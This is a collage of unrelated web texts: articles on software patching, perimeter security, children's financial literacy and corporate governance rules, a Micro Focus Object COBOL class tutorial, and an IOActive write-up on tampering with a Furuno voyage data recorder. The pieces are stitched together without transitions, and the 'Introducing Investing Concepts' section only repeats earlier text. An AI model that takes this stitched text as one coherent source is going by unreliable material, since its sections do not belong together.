Business owners are responsible for safeguarding the information users entrust to their systems. Companies that fail to live up to this standard can face severe consequences. Remember the case of Equifax, which the Federal Trade Commission ordered to provide $125 or 10 years of free credit monitoring for having exposed the personal information of 147 million people back in 2017.

#5. It protects others on your network

A virus that infiltrates a computer network can quickly spread to other devices connected to that network. Thus, one unpatched system or one incautious user can trigger severe consequences for a whole network of systems.

If you're still not convinced of the importance of security patches, maybe you should read down-to-earth software patching advice from 15 top cybersecurity experts to make software updates and patches part of your digital routine. If they won't persuade you to take great care of your online data, probably no one else will.

Wrapping it up...

Software patches are among the most critical tools users and organizations have for adequate cybersecurity. I can assure you that a fully updated system is one of the best defenses against vulnerabilities. Keep in mind that it's always a smart choice to enable automatic updates for your OS and applications.

If you manage larger networks, you have a bit more work to do to keep your systems patched with the latest updates. You must pay close attention to the network's needs, minimizing or eliminating downtime for critical systems. You will need to implement patch management best practices, test patches appropriately, and cautiously establish any potential impacts they may have.
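For administrators who want to go one step beyond enabling automatic updates, a short script can report which packages are still awaiting patches. The sketch below assumes a Debian- or Ubuntu-based Linux system, where the apt list --upgradable command is available; on other platforms the equivalent command differs.

import subprocess

# 'apt list --upgradable' prints one line per package with a pending
# update on Debian/Ubuntu systems.
result = subprocess.run(
    ["apt", "list", "--upgradable"],
    capture_output=True, text=True, check=False,
)

pending = [line for line in result.stdout.splitlines() if "upgradable" in line]
if pending:
    print(f"{len(pending)} package(s) awaiting patches:")
    for line in pending:
        print(" ", line)
else:
    print("System is fully patched")

Run from a scheduled job, a check like this gives a daily picture of patch debt across a fleet, which is exactly the kind of visibility patch management policies are meant to provide.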
Perimeter security plays a vital role in safeguarding buildings, campuses, and critical infrastructure against unauthorized access and potential threats. While physical barriers like fences and gates form the foundation of perimeter security, the integration of active perimeter security devices is crucial. These devices empower security teams to detect, analyze, and respond swiftly to any intrusion or suspicious activities, enhancing overall site and building security. Understanding Perimeter Security: A Brief Overview Perimeter security encompasses a range of solutions designed to create a robust defense system. A comprehensive perimeter security solution should include security video cameras, perimeter lighting, motion sensors, alarm systems, intrusion detection systems, and perimeter access control systems. It is essential for businesses to consider both indoor and outdoor perimeter security systems for comprehensive protection. Types of Perimeter Protection Devices - Perimeter Security Cameras: These strategically positioned cameras monitor vulnerable areas, analyze recorded video footage, and detect suspicious activities. Clear imaging, even in low-light conditions, is vital for effective surveillance. - Perimeter Access Control: Access control systems verify the identity of employees and visitors, enabling secure entry via perimeter doors or gates. Modern cloud-based access control systems provide remote management capabilities, enhancing convenience and security. - Security Perimeter Sensors: Sensors placed near entrances and fences detect movements and disturbances, alerting security teams to potential intrusions. Various sensor types, such as motion sensors and vibration sensors, serve specific purposes in enhancing security. - Perimeter Alarm Systems: These systems work in tandem with security sensors to alert security teams to activities that require investigation. Alarms can be transmitted through hard-wired links or the internet for rapid response. - Physical Barriers: Walls, fences, gates, doors, and barriers create a physical perimeter protection system, deterring intruders and ensuring only authorized personnel gain entry. Building an Effective Perimeter Protection Strategy An integrated perimeter security strategy combines physical barriers with advanced security technologies and skilled security personnel. Key processes include deterrence, detection, assessment, response, communication, recording, and analysis. By integrating these processes, businesses can create a robust defense against threats. Benefits of a Complete Perimeter Security Solution Implementing a comprehensive perimeter security solution offers several advantages: - Reduction in Intrusions: Restricts unauthorized access, ensuring only authorized individuals and vehicles enter the site. - Increased Situational Awareness: Provides a 360-degree view of perimeter and site activities, enabling swift response to incidents. - Faster Incident Response: Accurate notifications and high-speed network capabilities facilitate rapid assessment and response to security incidents. - Greater Protection: Enhances security, safeguarding facilities, assets, and people on-site. Planning Your Perimeter Security System Designing an effective perimeter security system requires a tailored approach. Conducting a physical security risk assessment, site survey, and selecting appropriate equipment based on performance and reliability are crucial steps. 
Collaborating with professional security system specialists can provide expert advice, ensuring a robust and customized perimeter security solution for your business.
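To illustrate how the detection, assessment, response, and recording processes described above can be chained together, here is a deliberately simplified sketch. Real perimeter platforms integrate sensors, cameras, and alarms through vendor APIs, which this example does not attempt to model; the zone policy and event types are invented for illustration.

from dataclasses import dataclass
from datetime import datetime

@dataclass
class SensorEvent:
    sensor_id: str
    kind: str   # e.g. "motion" or "vibration"
    zone: str

# Zones where any event should raise an alarm (an assumed policy).
CRITICAL_ZONES = {"main-gate", "server-room-fence"}

def assess(event: SensorEvent) -> bool:
    # Assessment step: decide whether an event warrants a response.
    return event.zone in CRITICAL_ZONES

def respond(event: SensorEvent) -> None:
    # Response and recording steps: alert the team and log the incident.
    stamp = datetime.now().isoformat(timespec="seconds")
    print(f"[{stamp}] ALARM: {event.kind} at {event.zone} ({event.sensor_id})")

for event in [SensorEvent("s-01", "motion", "car-park"),
              SensorEvent("s-07", "vibration", "main-gate")]:
    if assess(event):
        respond(event)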
In the Objects and Messages Tutorial you learned how to create instances of a class and send messages. In this chapter you will learn how to write classes for objects of your own, using the example Stopwatch class introduced in the Objects and Messages Tutorial.

The first part of the discussion looks at the way a class program is built up, using relatively little syntax which is different from ANSI 85 COBOL. It is followed by sections in which you animate through the Stopwatch code. This tutorial consists of two sessions: examining the structure of a class program, and animating the Stopwatch class. Time to complete: 45 minutes.

This tutorial starts with a look at the overall structure of a class program, using the Editor to examine the structure of Stopwatch. The class program consists of a set of nested programs. Nesting programs is a concept which was introduced to COBOL in the ANSI 85 standard. The sections below examine the following elements of the class program: the Class-Id paragraph, the Class-Control paragraph, the class object, the object program, and the class and instance methods.

Start by loading Stopwatch (stopwtch.cbl) into the Editor. As you read the explanations in the following sections, use the Editor to locate and examine the code in stopwtch.cbl.

Each class program starts with a Class-Id paragraph and finishes with an End Class clause. These bracket the outermost level of the nesting. The Stopwatch class looks like this:

class-id. Stopwatch
    data is protected
    inherits from Base.
...
end class Stopwatch.

The inherits from phrase identifies Stopwatch's superclass, Base. The data is protected phrase enables any subclasses of Stopwatch to inherit Stopwatch data. If this clause is omitted, or replaced by data is private, subclasses of Stopwatch cannot access inherited data directly. Inheritance of data is explained in more detail in the Inheritance Tutorial.

The Class-Control paragraph identifies the executable code files which implement the classes used by the program. The superclass, the class itself, and every class which will be invoked from the class must be identified. To see the Class-Control paragraph for Stopwatch, scroll down the text edit pane until you reach it, located directly below tag S005. The paragraph looks like this:

class-control.
    Base is class "base"
    StopWatch is class "stopwtch"
    .

The is class clause serves two purposes: it declares a name by which a class is known inside the program, and it identifies the executable file which implements that class.

On Object COBOL for UNIX, a class is guaranteed to be loaded before the class object receives its first message. Usually this occurs when you send the first message to the class object, but before the class object receives it. This is the same behavior as Object COBOL on NetExpress.

The class object program defines the data and methods for the class object. It is nested within the class program, immediately following the class program data division (if there is one). It looks like this:

class-object.
    object-storage section.
    * class data
    ...
    * class methods
end class-object.

The Object-Storage Section defines the class object data. The class object data can only be accessed from the class methods. It can also be inherited for direct access by subclasses (this depends on the contents of the Class-Id paragraph).

Each class method is a nested program. The code below shows an outline for a "new" method for Stopwatch:

method-id. "new".
...
linkage section.
01 lnkWatch object reference.
procedure division returning lnkWatch.
* code to create and initialize a Stopwatch object.
    exit method.
end method "new".

As with the class program itself, you can declare different types of data in the Data Division of the method. The DATA DIVISION header itself is optional.
Data declared here is only accessible to the code in this method. The data division can contain any of the following sections:

Working-Storage Section. Variables used by the method for processing. Data in Working-Storage is never reinitialized between different invocations of the method. This Working-Storage data is also shared between all instances of the object - you can't rely on it not being overwritten by a different instance between invocations.

Local-Storage Section. Variables needed to support recursive working by the method. When a method is called recursively, new local-storage data is created for each level of recursion. You have to initialize the data items within the method code; although VALUE clauses in Local-Storage are accepted by the Compiler, they have no effect at run-time.

Linkage Section. Variables passed as parameters to and from the program.

The Procedure Division contains the code for the method. You terminate processing of the method with an EXIT METHOD statement. This returns processing to the program which invoked the method. Locate the "new" method in the Editor and note that it uses a Linkage Section to return data from the method.

The object program defines the data and methods for instances of the class. It is nested within the class program. It looks like this:

object.
    object-storage section.
    * instance data for the object
    ...
    * instance methods
end object.

The only Data Division section that has any meaning in an object program is the Object-Storage Section. You can create other data sections, but the run-time behavior if you try to access the data in these sections is undefined. Any data you declare in the Object-Storage Section is accessible to all the instance methods, and may be inherited by instances of subclasses of the class. There is no Procedure Division in an object program, only methods. To write an initialization method for instances, write a method called "initialize", and then invoke it from the "new" method for the class after you have created an instance.

To see the object program and data declarations for Stopwatch, look below tags B009 and B010, where the Object header and Object-Storage Section are located.

Instance methods are nested inside the object program. Writing an instance method is exactly like writing a class method, the only difference being the scope of data which the instance method can access. The instance method can access data declared in its own Data Division and in the Object-Storage Section of the object program; it cannot access data declared in the class object.

Now look at the "start" method for Stopwatch. This method does not declare any data of its own, but makes changes to the object's state by altering data declared in the Object-Storage Section.

The code below summarizes the structure of an Object COBOL class, and recaps the material covered so far in this tutorial:

class-id. Stopwatch inherits from Base.  *> Identification and inheritance.
class-control.                           *> Class-Control paragraph names the
    Stopwatch is class "stopwtch"        *> files containing the executables
    Base is class "base"                 *> for each class.
    .                                    *> Period terminates the paragraph.
data division.                           *> Data division header is optional.
...
working-storage section.
...
procedure division.                      *> Procedure division is optional. You
                                         *> can use it for class initialization.
    exit program.                        *> Terminates the procedure division.
class-object.                            *> Defines the start of the class object.
    object-storage section.              *> Defines class object data.
    ...
    method-id. "new".                    *> Start of class method "new".
    ...
    end method "new".                    *> End of class method "new".
end class-object.                        *> End of the class object.
object.                                  *> Start of the code defining the
                                         *> behavior of instances of the class.
        object-storage section.         *> Defines instance data.
        ...
        method-id. "start".             *> Start of instance method "start".
        ...
        end method "start".             *> End of instance method.
    end object.                         *> End of code for instances.

    end class Stopwatch.

This completes the summary of class structure. In the next session you will animate some of the Stopwatch code.

In this session, you will animate some of the code in the Stopwatch class, to see how classes and objects work. You are going to use the same programs as in the Objects and Messages Tutorial, but this time Stopwatch is compiled for animation so that you can see the code execute. To animate the Stopwatch class, compile timer.cbl and stopwtch.cbl for animation and start the Animator. Animator starts with the statement below tag T001 highlighted, ready for execution:

    invoke StopWatch "new" ...

This sends the "new" message to the Stopwatch class, and execution switches to the "new" method of the Stopwatch class. The next statement is:

    invoke super "new" ...

The mechanism for actually creating a new object (allocating the memory and returning an object handle) is inherited from the supplied class library, and this statement executes the inherited method. Some classes do not implement the "new" method at all, but rely on the inherited method. Those that re-implement it usually do so to send an initialization message to the new object. In this case we have overridden it to keep track of the number of instances created:

    add 1 to osCount

Data item osCount is part of the class data, which is declared in the class Object-Storage Section. Step through the code, up to and including the exit method statement, to return from the method back to timer.cbl. The next statement is:

    invoke wsStopWatch1 "start"

Control switches to the "start" method of Stopwatch. Scroll up through the code to the Object header (between tags S030 and S035). Methods which appear after the Object header are instance methods, and can access data declared in the Object-Storage Section below the Object header. They can't access data declared in the class object (between the Class-Object and End Class-Object headers). The "start" method tests to see whether the stopwatch is currently running, and if it isn't, stores the current time in Object-Storage, in the startTime variable. Step through the code, up to and including the exit method; control returns to timer.cbl.

When you reach the second invoke StopWatch "new" statement, push the Perform Step keys. This creates a second stopwatch; using Perform Step saves you from having to step through all the "new" code a second time. The next statement is:

    invoke Stopwatch "howMany"

Execution switches to the "howMany" method of Stopwatch. This is a class method (between the Class-Object and End Class-Object headers), and returns the value in class data variable osCount. Step through the code, from move osCount to lnkCount up to and including the exit method. The next statement is:

    invoke wsStopwatch2 "start"

Execution switches to the "start" method of Stopwatch. When you executed this method previously, you set watchRunning to true, but now it reads false. The reason is that each instance of Stopwatch has its own unique data. The last time you executed this method, you sent the "start" message to the instance of Stopwatch represented by the handle in wsStopwatch1; this time you have sent it to a different instance, which has its own data. Control returns to timer.cbl.

At this point you have seen class object and instance object code executing, and how different instances have different data. You can animate the rest of the code if you are interested to see how the Stopwatch works. This concludes this tutorial on writing a class program.
In this tutorial you learned how a class program is built from nested programs: the roles of the Class-Id and Class-Control paragraphs, how the class object holds class data and class methods, and how the object program holds instance data and instance methods. You also saw, by animating Stopwatch, that class data is shared through the class object while each instance keeps its own copy of the instance data. The next tutorial explains inheritance in more detail.

Copyright © 1999 MERANT International Limited. All rights reserved. This document and the proprietary marks and names used herein are protected by international law.
<urn:uuid:4ad12803-f0a7-46c7-933b-33d778165c7f>
CC-MAIN-2024-38
https://www.microfocus.com/documentation/server-express/sx20books/opclau.htm
2024-09-11T04:29:07Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651343.80/warc/CC-MAIN-20240911020451-20240911050451-00624.warc.gz
en
0.881394
2,415
3.75
4
Financial literacy is an essential skill that sets the foundation for a secure future. Given the complexities of today’s economic landscape, introducing children to financial concepts from an early age can prove transformative. From teaching simple budgeting principles to instilling the value of saving and investing, early financial education equips children with the tools they need for financial independence. This article explores the methodologies, benefits, and practical strategies for teaching financial literacy to children, ensuring they are well-prepared for their financial futures. The Importance of Early Financial Education Starting financial education early, even as young as age three, can profoundly impact an individual’s financial outcomes. Studies have shown that children who are taught about money management from an early age have better financial habits and outcomes in adulthood. Engaging young minds with game-based learning activities can make the concept of money more tangible and less abstract. Games that simulate buying, selling, and saving can make learning about finances both educational and fun. By modeling positive financial behaviors, parents can provide real-life lessons that stick. Actions speak louder than words, and children who see their parents manage money wisely are more likely to emulate these behaviors. The way parents handle their finances—whether through budgeting, saving, or investing—serves as a living example for their children. Furthermore, providing children with allowances presents an excellent opportunity to introduce concepts like savings, budgeting, and responsible spending. Allowing children to manage small sums of money can prepare them for larger financial responsibilities in the future. Engaging children in practical money-handling activities, such as setting up small accounts or managing prepaid cards, helps them gain firsthand experience with financial concepts. This experiential learning is crucial for developing a strong understanding of money management principles. By combining these practices with open discussions about money and its role in daily life, parents can create a holistic financial education environment at home. Parental Involvement in Financial Education Parents are often the first point of contact when it comes to children learning about money. By involving children in financial discussions and decisions, parents can lay a strong foundation for understanding financial concepts from a young age. Discussing family budgeting, for example, can teach children about the difference between needs and wants, and the importance of planning and prioritizing expenditures. Providing real-money lessons can be incredibly beneficial. Allowances can be structured to incentivize savings and teach budgeting. For instance, encouraging children to set aside a portion of their allowance for savings and another portion for personal spending can foster a disciplined approach to money management. Additionally, engaging children in discussions about financial goals—such as saving for a desired toy or gadget—can illustrate the benefits of delayed gratification. Taking an active role in a child’s financial education involves more than just providing allowances. Parents can set up small savings goals and track progress together, fostering a sense of achievement and responsibility. This collaborative approach helps children see the value of setting financial goals and working towards them. 
Over time, these small lessons can build a solid foundation for managing larger financial tasks, such as paying bills or making investment decisions, as they grow older. Structured Financial Literacy Programs in Schools The formal inclusion of financial literacy in school curricula is gaining traction, with an increasing number of states mandating personal finance courses in schools. These programs are designed to teach students critical financial concepts such as budgeting, saving, investing, and understanding credit. Early exposure to these subjects can demystify finances and reduce financial anxiety among students. Schools offer an excellent environment for structured learning, where students can engage in both theoretical lessons and practical applications. Financial education apps and digital platforms, when integrated into the classroom, further enhance engagement and accessibility. These tools help students practice financial concepts in real-time, offering simulations that mirror real-life financial decisions and consequences. Practical exercises, such as managing a small budget for a class project or participating in simulated stock market games, allow students to apply what they’ve learned in a controlled and supportive environment. These activities help build confidence and prepare students for real-world financial responsibilities. By incorporating financial literacy into school curricula, educators can ensure that all children, regardless of their home environment, receive a solid financial education. This exposure to financial management at school complements the lessons learned at home, creating a comprehensive learning experience that prepares students for future financial challenges. Key Financial Concepts: Budgeting and Saving One of the foundational pillars of financial literacy is budgeting. Teaching children how to budget involves outlining the principles of dividing money into different categories such as needs, wants, and savings. The commonly cited 50/30/20 rule—allocating 50% of income to needs, 30% to wants, and 20% to savings—can serve as a practical guideline. To make budgeting more relatable, parents and educators can leverage tools like visual charts or digital apps. For younger children, a simple three-jar system—one jar for saving, one for spending, and one for giving—can be a hands-on way to teach budgeting. As children grow older, transitioning to more sophisticated budgeting tools, such as spreadsheets or dedicated apps, can help them manage their finances effectively. Saving is another critical concept that should be introduced early. Children should be encouraged to set savings goals—both short-term for small purchases and long-term for more significant financial milestones. Understanding the value of saving for future needs and emergencies can instill a sense of financial security and responsibility. By involving children in setting their savings goals and tracking their progress, they can see the tangible benefits of delayed gratification and disciplined saving habits. Furthermore, explaining the significance of emergency funds can prepare children for unexpected financial challenges. By teaching them to set aside money for unforeseen circumstances, parents and educators can help children build a safety net that offers peace of mind. This early introduction to the importance of saving not only helps children develop healthy financial habits but also cultivates a mindset of preparedness that will serve them well throughout their lives. 
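The arithmetic behind the 50/30/20 rule is simple enough to automate, which can itself be a teaching exercise for older children. Below is a minimal Python sketch of the split; the allowance figure is just an example, not a recommendation.

    def split_50_30_20(income: float) -> dict:
        # Allocate money per the 50/30/20 guideline described above.
        return {
            "needs": round(income * 0.50, 2),
            "wants": round(income * 0.30, 2),
            "savings": round(income * 0.20, 2),
        }

    print(split_50_30_20(40.0))
    # {'needs': 20.0, 'wants': 12.0, 'savings': 8.0} for a $40 allowance

The same three-way split maps directly onto the three-jar system for younger children, so the digital and physical versions of the lesson reinforce each other.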
Introducing Investing Concepts Financial literacy is a crucial skill that lays the groundwork for a stable and secure future. In today’s intricate economic environment, introducing children to financial concepts at a young age can be transformative. Teaching them fundamental budgeting principles, the importance of saving, and the basics of investing offers them the tools necessary for financial independence. Early financial education doesn’t just prepare kids for adulthood; it instills habits that can lead to long-term financial well-being. This article delves into various methodologies for imparting financial literacy to children, highlighting both the benefits and practical strategies. By breaking down complex financial ideas into age-appropriate lessons, parents and educators can make the learning process engaging and effective. Introducing concepts like allowance management, goal setting, and the difference between needs and wants can make a significant impact. For instance, using games and interactive activities can help children grasp money management in a fun and memorable way. Real-world applications, such as involving them in grocery shopping or setting up a small savings jar, can solidify these lessons. Ultimately, equipping children with financial literacy from an early age ensures they are well-prepared to navigate the financial aspects of adulthood. By instilling sound financial habits and knowledge, we can help them achieve financial independence and security in their future lives.
<urn:uuid:e39b5476-faae-493e-9f63-b90d6727a513>
CC-MAIN-2024-38
https://bankingcurated.com/capital-risk-and-assets/how-can-early-financial-education-secure-your-childs-future/
2024-09-13T14:30:40Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651523.40/warc/CC-MAIN-20240913133933-20240913163933-00424.warc.gz
en
0.938318
1,501
3.890625
4
There are multiple facilities, devices, and systems located on ports and vessels and in the maritime domain in general, which are crucial to maintaining safe and secure operations across multiple sectors and nations. This blog post describes IOActive's research related to one type of equipment usually present in vessels, Voyage Data Recorders (VDRs) (http://www.imo.org/en/OurWork/Safety/Navigation/Pages/VDR.aspx). In order to understand a little bit more about these devices, I'll detail some of the internals and vulnerabilities found in one of them, the Furuno VR-3000. A VDR is the equivalent of an aircraft's 'black box'. These devices record crucial data, such as radar images, position, speed, and audio on the bridge. This data can be used to understand the root cause of an accident.

Several years ago, piracy acts were on the rise, with multiple cases reported almost every day. As a result, nation-states along with fishing and shipping companies decided to protect their fleets, either by sending in the military or by hiring private physical security companies. One widely reported case was the 2012 Enrica Lexie incident, in which Italian marines aboard the tanker Enrica Lexie shot two Indian fishermen off the coast of Kerala. During the subsequent legal process, an interesting detail was reported in several Indian newspapers: the vessel's VDR data covering the incident had been corrupted. Curiously, Furuno was the manufacturer of the corrupted VDR; this Kerala High Court document covers the fact: http://indiankanoon.org/doc/187144571/ However, we cannot say whether the model the Enrica Lexie was equipped with was the VR-3000. Just as a side note, the vessel was built in 2008 and the Furuno VR-3000 was apparently released in 2007.

From a security perspective, it seems clear VDRs pose a really interesting target. If you either want to spy on a vessel's activities or destroy sensitive data that may put your crew in a difficult position, VDRs are the key. Understanding a VDR's internals can provide authorities, or third parties, with valuable information when performing forensics investigations. However, the ability to precisely alter data can also enable anti-forensics attacks, as described in the real incident previously mentioned.

Basically, inside the Data Collecting Unit (DCU) is a Linux machine with multiple communication interfaces, such as USB, IEEE1394, and LAN. Also inside the DCU is a backup HDD that partially replicates the data stored on the Data Recording Unit (DRU). The DRU is protected against aggressions in order to survive in the case of an accident; it also contains a Flash disk to store data for a 12-hour period. This unit stores all essential navigation and status data, such as bridge conversations, VHF communications, and radar images. The International Maritime Organization (IMO) recommends that all VDR and S-VDR systems installed on or after 1 July 2006 be supplied with an accessible means for extracting the stored data from the VDR or S-VDR to a laptop computer. Manufacturers are required to provide software for extracting data, instructions for extracting data, and cables for connecting between a recording device and computer.

Take this function, extracted from the Playback software, as an example of how not to perform authentication. For those who are wondering what 'Encryptor' is, just a word: Scytale (a toy implementation appears below). VR-3000's firmware can be updated with the help of Windows software known as 'VDR Maintenance Viewer' (client-side), which is proprietary Furuno software. The VR-3000 firmware (server-side) contains a binary that implements part of the firmware update logic: 'moduleserv'. This service listens on 10110/TCP.
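As promised, here is a toy scytale. It is one of the oldest ciphers known: a pure transposition with a tiny key space (the number of rows) and no integrity protection whatsoever, so finding it in the role of 'Encryptor' says a lot. The Python sketch below is illustrative only; the actual Furuno routine is not reproduced here.

    def scytale_encrypt(plaintext: str, rows: int) -> str:
        # Classic scytale: write the text into a grid row by row,
        # then read it off column by column. Pad with spaces so the
        # grid is rectangular (so avoid trailing spaces in messages).
        cols = -(-len(plaintext) // rows)          # ceiling division
        padded = plaintext.ljust(rows * cols)
        return "".join(padded[i::rows] for i in range(rows))

    def scytale_decrypt(ciphertext: str, rows: int) -> str:
        # Reading the grid the other way undoes the transposition.
        cols = len(ciphertext) // rows
        return "".join(ciphertext[i::cols] for i in range(cols)).rstrip()

    ct = scytale_encrypt("attack at dawn", rows=4)
    assert scytale_decrypt(ct, rows=4) == "attack at dawn"

An attacker can brute-force the row count in a handful of tries, and nothing about the output proves who produced it, which is exactly why a transposition is no substitute for real authentication.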
Internally, both server (DCU) and client-side (VDR Maintenance Viewer, LivePlayer, etc.) use a proprietary session-oriented, binary protocol. Basically, each packet may contain a chain of 'data units' which, according to their type, contain different kinds of data. At this point, attackers could modify arbitrary data stored on the DCU in order to, for example, delete certain conversations from the bridge, delete radar images, or alter speed or position readings. Malicious actors could also use the VDR to spy on a vessel's crew, as VDRs are directly connected to microphones located, at a minimum, on the bridge. Before IMO's resolution MSC.233(90), VDRs did not have to comply with security standards to prevent data tampering. Taking into account that we have demonstrated these devices can be successfully attacked, any data collected from them should be carefully evaluated and verified to detect signs of potential tampering.
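To make the 'data unit' chaining described above concrete, here is a purely hypothetical parser for that style of format. The real VR-3000 protocol is proprietary and undocumented, so every field name and size below is invented; type-length-value framing is simply the conventional way such chained units are laid out.

    import struct

    def parse_data_units(payload: bytes):
        # Assumed header per unit: 2-byte type, 4-byte length, big-endian.
        # These sizes are illustrative, not Furuno's actual layout.
        units = []
        offset = 0
        while offset + 6 <= len(payload):
            unit_type, length = struct.unpack_from(">HI", payload, offset)
            offset += 6
            data = payload[offset:offset + length]
            if len(data) < length:
                raise ValueError("truncated data unit")
            units.append((unit_type, data))
            offset += length
        return units

Note that a parser like this happily accepts whatever it is fed; without cryptographic integrity checks on the units themselves, tampering is invisible at the protocol level, which is the core of the problem described above.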
<urn:uuid:db49dd62-d911-4368-9c77-ff1b4fcd89b1>
CC-MAIN-2024-38
https://ioactive.com/maritime-security-hacking-into-a-voyage-data-recorder-vdr/
2024-09-13T16:01:22Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651523.40/warc/CC-MAIN-20240913133933-20240913163933-00424.warc.gz
en
0.940421
981
2.734375
3
Corporate governance rules: What they are & why they matter Corporate governance is the (not so) secret to efficient, secure, high-performing organizations. However, organizations need corporate governance rules to truly walk the governance walk — not just talk the talk. Rules tell employees at all levels how to put critical governance principles into practice. Yet, rules aren’t just an internal tool. Just as organizations have rules stakeholders must follow, regulatory agencies have strict rules related to governance. Following them is the key to maintaining good standing, avoiding costly regulatory action, and listing shares in essential markets. Here, we’ll cover key aspects of corporate governance rules and how to apply them, including: - What corporate governance rules are - The five golden rules of corporate governance - Principles common across modern companies - Corporate governance listing rules for Nasdaq, the NYSE and the SEC What are corporate governance rules? Corporate governance rules are policies and practices that guide stakeholders in enacting the organization’s governance framework. These rules can be issued by the organization itself or by a regulator. In either case, though, rules enhance accountability and organization performance while aiding compliance with key governance practices. The 5 golden rules of corporate governance Governance frameworks vary between organizations, but several basic principles underpin them all. These principles are called the “golden rules” because they’re fundamental to effective governance practices and ensure that organizations serve all of their stakeholders well. These rules are: - Responsibility: Organizations are responsible for monitoring and managing risks, including comprehensive internal controls, a clear risk management strategy, and policies for addressing issues like compliance or conflicts of interest. - Accountability: Establish clear roles and communicate them effectively so all stakeholders understand exactly what they’re responsible for and who they’re accountable to. Boards, for example, are accountable to shareholders, while management is accountable to the board. - Awareness: To follow corporate governance rules, stakeholders need to know them. Awareness ensures that all stakeholders understand their role in upholding the organization’s ethical standards and regulatory requirements. - Fairness: Organizations must serve all stakeholders fairly and should have rules to advance that charge. This involves promoting workplace and boardroom equity and fostering an inclusive environment. - Transparency: Companies should act transparently internally and externally. Stakeholders should have any information material to their work or investment decisions, while regulators and shareholders should receive timely, accurate financial and non-financial disclosures. Other principles of corporate governance Together, the five golden rules form a solid corporate governance foundation, but they are only a few ways organizations should conduct themselves. Governance standards can be wider reaching and often include: - Ethics: Companies have a legal and moral obligation to act ethically. Corporate governance rules should include clear codes of conduct, guiding employees at all levels to adhere to practices that promote honesty, fairness and transparency. - Risk management: Risk is inherent in any organization, but good governance should mitigate it. 
This involves developing a risk management framework and internal controls related to risk and financial reporting. - Stakeholder engagement: Governance helps corporations serve their shareholders by implementing rules for communicating with and engaging stakeholders, which include shareholders, employees, customers and the community. Common rules governing modern companies National laws and regulations often influence corporate governance rules, leading to similar rules across corporations — regardless of the industry. By following them, organizations build trust with their investors, employees and community and affirm their commitment to responsible, ethical operations. Most, if not all, corporations will have rules around: - Board composition: Most organizations have corporate governance rules that dictate the number of directors on the board and how many should be executive, non-executive or independent. This ensures a diverse and balanced set of perspectives in the boardroom. - Executive compensation: Corporate governance also defines the structure of executive compensation, including salary and non-salary benefits. Compensation should reflect the executive’s experience and the corporation's performance and goals. Organizations should also have rules requiring the disclosure of those salaries and the criteria behind them. - Shareholder rights: A key tenet of corporate governance is that shareholders have rights, including voting on key issues. Corporate governance rules entitle shareholders to weigh in on board appointments or changes in strategic direction, among other priorities. Organizations must also protect minority shareholders against controlling shareholders. - Financial reporting: Organizations disclose their financials accurately and timely. This supports shareholders’ rights by giving them the information they need to make key decisions, but it’s also a regulatory requirement. Companies that don’t comply face strict regulatory action, including fines. Nasdaq corporate governance listing rules Corporate governance rules aren’t just for employees. Nasdaq is one of several markets that has specific corporate governance rules. Organizations that meet them can be listed on the Nasdaq Stock Market, while organizations that don’t either won’t be listed or will risk being de-listed. The Nasdaq rules seek to promote transparency and accountability in business dealings and oversee several areas, including: - Board of Directors: Nasdaq regulates several characteristics of the board. Most board directors must be independent to be listed on the Nasdaq Stock Market. The directors must also meet regularly without management present to ensure impartial board activity. - Board committees: Organizations listed on Nasdaq must also have several board committees, each of which should be composed of independent directors and at least one director considered an expert in the subject. These include the audit, compensation and governance committees. - Code of conduct: To enhance company integrity, Nasdaq also requires organizations to have a code of conduct that applies to all employees, executives and board directors. The code should be public and include rules specific to conflicts of interest and compliance. - Shareholder meetings: Nasdaq requires shareholders to meet annually to ensure shareholders have a voice in the boardroom. Companies must also establish a quorum at those meetings, meaning enough shareholders are present to represent one-third of the shares. 
- Corporate governance framework: Organizations must have corporate governance rules before listing on Nasdaq. That includes adopting and disclosing practices for various operations, including board roles, responsibilities, compensation and more; many organizations use a governance platform to meet this rigorous standard. NYSE corporate governance listing rules Like Nasdaq, the New York Stock Exchange (NYSE) has strict rules they monitor and enforce for all listed companies. NYSE does have many of the same rules as Nasdaq, but there are some distinct requirements, including: - Shareholder approval of executive compensation: The NYSE requires that shareholders vote on and approve all executive compensation packages, including any changes to the compensation of existing executives. - Certification: Before organizations can list on the NYSE, the CEO must personally certify that they do not know of noncompliance with NYSE listing rules. CEOs are also obligated to notify the NYSE immediately if any executive learns of instances of noncompliance. - Website disclosure: NYSE-listed companies must have a publicly available website and publish corporate governance documents there, including committee charters, corporate governance principles, and more. SEC corporate governance listing rules The Securities and Exchange Commission (SEC) is a regulatory body that governs all publicly traded companies in the United States. As such, the SEC doesn’t have listing rules of its own. Instead, it has various regulations that impact corporate governance, all of which aim to protect investors and maintain fair markets. A few of the better-known regulations in recent years are: - Sarbanes-Oxley (SOX) Act of 2002: The SOX Act relates specifically to financial reporting and disclosures, requiring that covered organizations implement robust internal controls over financial reporting and certify the accuracy of financial statements. - Dodd-Frank Wall Street Reform and Consumer Protection Act: This regulation, known as the Dodd-Frank Act, offers guidelines for executive compensation. The act mandates that organizations conduct a non-binding shareholder vote and that companies have policies for recovering executive compensation in the event of misconduct, among other stipulations. - Universal proxy: The SEC gives shareholders the right to make their own proposals at annual meetings. Under universal proxy, shareholder proposals will appear on the same universal proxy card as the organization’s proposals, giving more credence to investors’ voices. - Climate risk disclosure: One of its newest regulations, the SEC’s climate risk disclosure rule, requires companies to disclose climate-related risks and whether those risks are integrated into the organization’s enterprise risk management strategy. Master good governance principles and practices Corporate governance rules are your organization’s rails; they keep the train on track toward ethical, accountable and honest business practices. However, they don’t propel the train forward. The engine does. Likewise, the combination of effective rules and robust practices truly puts governance in motion. While your rules say to act ethically, for example, the principles explain exactly how employees should act ethically, whether they’re involved in executive compensation decisions, financial reporting, board succession planning or anything else governance touches. Learn more about what constitutes good governance and how to adopt effective principles for your organization.
<urn:uuid:f934aa84-6f28-4909-8952-30086500f5b0>
CC-MAIN-2024-38
https://www.diligent.com/resources/blog/corporate-governance-rules
2024-09-14T20:18:47Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.74/warc/CC-MAIN-20240914193334-20240914223334-00324.warc.gz
en
0.951645
1,882
2.578125
3
